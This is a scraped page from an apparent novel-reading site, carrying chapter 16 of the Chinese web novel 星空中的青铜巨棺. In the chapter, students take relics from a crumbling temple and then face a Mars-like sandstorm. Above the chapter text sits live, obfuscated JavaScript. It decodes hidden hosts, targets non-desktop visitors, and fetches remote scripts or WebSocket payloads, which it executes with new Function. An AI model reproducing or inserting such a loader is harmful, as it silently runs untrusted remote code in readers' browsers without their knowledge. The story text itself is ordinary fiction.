笔趣阁

字:
关灯 护眼
笔趣阁 > 星空中的青铜巨棺 > 第十六章 如神祗临尘
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十六章 如神祗临尘

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    第十六章如神祗临尘
  
      除金刚杵外,还有数人寻到破损的香炉、戒尺、铜铃、鱼鼓等。
  
      其中那名被叶凡同情、在同学聚会上神色憔悴的女同学寻到一件特别的器物。那是一串完整的念珠,仅有六颗,晶莹欲滴,呈淡金色,如水晶般透亮,每颗都有龙眼那么大。
  
      “该不会是舍利子制成的吧?”旁边的人惊疑不定的说道。
  
      这六颗珠子皆为淡金色的晶体,很像瑰丽的宝石,易让人联想到古佛圆寂后留下的舍利子,毕竟这是存在于大雷音寺中的器物,材质绝不会简单。
  
      这串念珠很不一般,是那名女同学无意间自那尊石佛头顶上发现的。六颗珠子被一根透明细线穿在一起,每颗上面都一尊模糊的人形图案,姿势各不相同。
  
      这是继叶凡的铜灯、周毅的钵盂后第三件完整无损的器物,当然还是那盏铜灯最为引人注目,毕竟这是唯一没有沾染尘埃的古灯,长明不灭,任谁都可看出不凡。
  
      古庙中有数道炙热的光芒不时瞄向铜灯,叶凡虽然感应到了,但是并没有任何表示,他非常平静的面对这一切。
  
      大雷音寺的佛殿已经被寻遍,再无其他器物,众人退了出来。
  
      庞博最为郁闷,先后有十几人寻到古物,他是最先走入庙宇中的人,但是到现在依然一无所获,什么也没有发现。
  
      站在庙宇前重新打量古庙,庞博的双眼顿时亮了起来,他大步流星走了回去,搬来几块大石垫在脚下,他将那面刻印有“大雷音寺”的铜匾摘了下来,顿时让在场不少人目瞪口呆。
  
      随后众人恍然,这块铜匾肯定不凡,饱受风霜洗礼,经历时间磨砺,并没有在其上留下点滴尘埃,上面非常洁净。要知道古庙内所有器物中,也唯有那盏青铜古灯纤尘不染,铜匾亦如此,显然非凡。
  
      “还真是沉重……”庞博拖着铜匾走了回来,他刚刚离开庙宇,整座古庙便摇动了起来,里面那尊石佛竟突然龟裂,发出“喀嚓喀嚓”的声响。
  
      而后,佛家六字真言响起:“嗡、嘛、呢、叭、咪、?……”
  
      宏大的佛音响彻天宇,震动了苍穹,天地**皆在颤动!
  
      慈悲、庄严、高妙、玄奥的禅音无比浩大,涤尽污垢,洗尽凡尘,古庙周围都沐浴在一片神圣祥和的光芒中。
  
      这一次绝非幻觉,不仅叶凡与庞博听到,其他所有人都全部如泥塑木雕一般,震惊的说不出话来。
  
      同一时间,众人在佛殿中寻到的所有器物,无论是完好的,还是破损的,全都发出柔和的光辉,灿灿光芒照耀,让每一个人都心惊不已。
  
      但是,最终“轰”的一声巨响,古庙内那尊石佛粉碎,化成飞灰,随后大雷音寺也在一阵微风中化为齑粉。
  
      “噗”
  
      同一时间,那株相伴在旁的菩提古树也崩碎了,没有木屑,没有枯枝,有的只是漫天的飞灰,纷纷扬扬而下。
  
      接下来,众人手中的佛器光华内敛,全部暗淡了下来,再次归于平凡。
  
      所有人全部呆住了,不知道为何会发生这样的事情,难道是取走了庙宇中的佛器,摘走了铜匾所致?
  
      古庙仅留下一地飞灰,什么也没有剩下,叶凡凝望片刻后,道:“取走各种佛器,摘走古庙的匾额,让本就已荒弃的大雷音寺失去了存在下去的意义,或许这就是它随风而散的原因吧。”
  
      周毅平日温文尔雅,此刻却非常激动,目露奇光,道:“我现在更加坚定了,这个世上真的有神祗,也许可以沿着他们留下的足迹前进,今日所遭遇种种对于我们来说也许是一种莫大的契机。”
  
      神祗、佛陀、不朽……这些荒诞的传说现在被提起,没有人会觉得过于荒谬,眼前这些事实预示着许多常理都可以被颠覆,神不是绝对不存在。
  
      “沿着神祗留下的足迹前进……说的容易,但我没有看到希望。”庞博斜了周毅一眼,道:“眼下想办法活下去最要紧,这片荒漠中前不着村后不着店,没有水源,没有食物,再过上七八个小时,情况恐怕会变得极其糟糕。”
  
      “种种迹象表明,这颗星球多半就是火星,而我们都知道火星上不可能具有生存的环境。”李小曼清丽动人,经过一些列事件后,她变得越发镇定了,继续道:“如果真的有神存在,那么也许可以解释这一切,这里仅仅是火星上的一片狭小的净土。”
  
      她的话语刚落,红褐色的大地上便突然传来阵阵隆隆之响,空旷的大地都摇动了起来,像是有千军万马在奔腾,又像是有怒海狂涛在汹涌。
  
      “沙暴……火星上的超级大风暴!”李小曼身边的凯德神色大变,以不流利的汉语大叫了起来。
  
      火星每年都有四分之一的时间笼罩在漫天的狂沙中,地球上的大台风每秒六十多米,而火星上的风暴却高达每秒一百八十米,超级大风暴可以席卷整个星球。
  
      不要说是人,就是重型坦克也要被卷上高天!
  
      仅仅一瞬间,漫天的星月全部消失了,无尽红褐色的沙尘彻底覆盖了天穹,一场席卷整片火星的大风暴开启了。
  
      “不对,我们这里没有风暴……”
  
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师